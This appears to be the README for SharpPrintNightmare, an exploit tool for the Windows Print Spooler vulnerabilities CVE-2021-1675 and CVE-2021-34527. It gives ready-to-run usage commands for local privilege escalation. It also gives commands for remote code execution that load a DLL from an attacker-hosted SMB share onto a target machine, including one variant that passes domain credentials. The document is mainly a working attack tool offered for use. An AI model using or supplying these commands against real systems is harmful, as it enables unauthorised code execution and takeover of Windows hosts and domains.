2021-07-03 11:53:46 +00:00

# C# Implementation of CVE-2021-1675 / CVE-2021-34527

### Update

A new `CVE-2021-1675.py` has been uploaded; it produces the same result as the C# version.

The C# version no longer requires pConfigFile to be specified manually.

### Usage

The RCE functionality might need to be executed with local administrator privileges on YOUR machine.

```
# LPE
C:\SharpPrintNightmare.exe C:\addCube.dll

# RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.20'

# RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.10' hackit.local domain_user Pass123
```

![](../Images/poc4.png)

![](../Images/poc3.png)

### Acknowledgements

For contributing new ideas or exploit improvements, thanks to:

* [kiqrx](https://www.hackthebox.eu/home/users/profile/72916)